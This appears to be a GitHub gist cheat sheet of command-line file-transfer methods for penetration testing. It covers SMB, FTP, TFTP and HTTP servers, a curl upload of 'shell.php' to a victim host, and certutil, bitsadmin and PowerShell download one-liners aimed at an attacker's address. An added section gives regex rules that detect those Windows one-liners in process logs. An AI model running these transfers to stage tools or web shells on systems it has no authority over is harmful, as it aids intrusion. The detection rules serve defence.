@richlamdev
Created July 26, 2020 15:50
CLI File Transfers
SMB
#git clone https://github.com/SecureAuthCorp/impacket.git
#cd impacket
#python setup.py install
cp /usr/share/doc/python3-impacket/examples/smbserver.py /tftp
python3 smbserver.py share-name /tftp
From Linux:
smbclient -L <ip of attacking machine>
smbclient //<ip of attacking machine>/share-name
--> get <file>
--> put <file>
From Windows:
net view \\ip-address
net use Z: \\computer_name\share-name [/PERSISTENT:YES]
net use Z: \\ip-addr\share-name [/PERSISTENT:YES]
net use Z: /delete
copy \\ip-addr\share-name\file out-file
FTP
# apt install python3-pip
# pip install pyftpdlib
To run the FTP server, run the following command from within the folder to share:
python -m pyftpdlib -w -p 21
receive file:
get <file>
OR
wget ftp://ip-addr[:port]/file [-O output-file]
send file:
put <file>
OR
curl -T <file> ftp://anonymous@<host>/
From Windows, non-interactive shell:
echo open ip-addr > ftp.txt
echo user username >> ftp.txt
echo password >> ftp.txt
echo binary >> ftp.txt
echo GET file.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
TFTPD
mkdir /tftp
atftpd --daemon --port 69 /tftp
# enable TFTP on windows:
pkgmgr /iu:"TFTP"
From Windows:
tftp -i <ip-address> { GET | PUT } <file>
HTTP Server
# python 2
python -m SimpleHTTPServer 8000
# python 3
python3 -m http.server 8000
# Ruby
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start'
# Ruby 1.9.2+
ruby -run -ehttpd . -p8000
# php - no directory listing! (127.0.0.1 is loopback only; bind 0.0.0.0:8000 to serve other hosts)
php -S 127.0.0.1:8000
# nc - no directory listing
while true ; do nc -l -p 1500 -c 'echo -e "HTTP/1.1 200 OK\n\n $(date)"'; done
UPLOAD METHODS:
Linux:
curl --upload-file shell.php --url http://$ip/shell.php --http1.0
On local (attacking) system:
cat filetoupload | base64 -w 0; echo
#double click on output to copy
On target (victim) system:
echo <copiedContent> | base64 -d > filetoupload
DOWNLOAD METHODS
Windows:
certutil -urlcache -split -f "http://ip-addr:port/file" [output-file]
powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')
powershell -c "Start-BitsTransfer -Source 'http://ip-addr:port/file' -Destination 'C:\<directory>\file'"
powershell wget "http://ip-addr:port/file" -outfile "c:\<directory>\filename"
bitsadmin /transfer job /download /priority high http://ip-addr:port/file c:\<directory>\file
bitsadmin /transfer job /download /priority foreground https://ip-addr:port/file C:\<directory>\file
Linux:
curl http://<ip-address>:port/<file> -o <output-filename>
wget http://<ip-address>:port/<file> -O <output-filename>
download ftp with wget, note binary mode is not supported for wget downloads via ftp
wget ftp://<ip-address>/<file> --ftp-user=<username> --ftp-password=<password>
perl -e 'use LWP::Simple; $url = "http://ip-addr:port/file"; $file ="filename"; getstore($url, $file);'
php -r '{ $in=fopen("http://ip-addr/file", "rb"); $out=fopen("filename", "wb"); while ($chunk = fread($in,8192)) { fwrite($out, $chunk, 8192); } fclose($in); fclose($out); } '
ruby -e 'require "net/http"; Net::HTTP.start("ip-addr") { |http|; resp = http.get("/filename"); open("download_via_ruby", "wb") { |file|; file.write(resp.body); }; }'
#python2
python -c 'import urllib2; u = urllib2.urlopen("http://ip-addr/file"); localFile = open("download_via_python", "wb"); localFile.write(u.read()); localFile.close()'
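DETECTION (added example, not part of the original gist):
The Windows transfer one-liners above leave recognisable process command lines, so a defender can flag them in process-creation logs. The rule names, the classify/scan helpers and the sample lines below are constructed for illustration.

```python
import re

# Heuristic patterns for the Windows transfer one-liners in this cheat sheet,
# applied to process command lines (e.g. Sysmon Event ID 1, Security 4688).
# Rule names are hypothetical labels, not identifiers from any product.
PS = r"\b(?:powershell|pwsh)(?:\.exe)?\b.*"
RULES = [(name, re.compile(rx, re.I)) for name, rx in [
    ("certutil-urlcache", r"\bcertutil(?:\.exe)?\b.*[-/]urlcache\b.*\bhttps?://"),
    ("bitsadmin-transfer", r"\bbitsadmin(?:\.exe)?\b.*/transfer\b.*\b(?:https?|ftp)://"),
    ("ps-webclient", PS + r"\bnet\.webclient\b.*\.download(?:file|string)\b"),
    ("ps-bitstransfer", PS + r"\bstart-bitstransfer\b"),
    ("ps-webrequest", PS + r"\b(?:wget|curl|iwr|invoke-webrequest)\b.*-outfile\b"),
    ("ftp-script", r"\bftp(?:\.exe)?\s.*-s:\S+"),
    ("tftp-transfer", r"\btftp(?:\.exe)?\s.*-i\s+\S+\s+(?:get|put)\b"),
]]
URL = re.compile(r"(?:https?|ftp)://[^\s'\")]+", re.I)

# Constructed sample command lines (192.0.2.0/24 is a documentation range).
SAMPLE = [
    r'certutil -urlcache -split -f "http://192.0.2.10:8000/tool.exe" tool.exe',
    r'C:\Windows\System32\bitsadmin.exe /transfer job /download /priority high '
    r'http://192.0.2.10:8000/a.bin C:\Temp\a.bin',
    r"powershell -c (New-Object Net.WebClient).DownloadFile('http://192.0.2.10:8000/a.bin', 'a.bin')",
    r'powershell wget "http://192.0.2.10:8000/a.bin" -outfile "c:\Temp\a.bin"',
    r'ftp -v -n -s:ftp.txt',
    r'certutil -hashfile C:\Temp\a.bin SHA256',   # benign certutil use
    r'ping 192.0.2.10',                            # unrelated process
]

def classify(cmdline):
    """Return (names of rules hit, URLs in the line) for one command line."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    urls = URL.findall(cmdline) if hits else []
    return hits, urls

def scan(cmdlines):
    """Return [(cmdline, hits, urls)] for the flagged command lines only."""
    flagged = []
    for line in cmdlines:
        hits, urls = classify(line)
        if hits:
            flagged.append((line, hits, urls))
    return flagged

if __name__ == "__main__":
    for line, hits, urls in scan(SAMPLE):
        print(",".join(hits), urls, "|", line)
```

These are substring heuristics on the command line only; renamed binaries or encoded PowerShell arguments need image-hash and script-block logging to catch.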
REFERENCES:
https://gist.github.com/willurd/5720255
https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65
https://isroot.nl/2018/07/09/post-exploitation-file-transfers-on-windows-the-manual-way/
https://sushant747.gitbooks.io/total-oscp-guide/content/transfering_files_to_windows.html
https://blog.ropnop.com/transferring-files-from-kali-to-windows/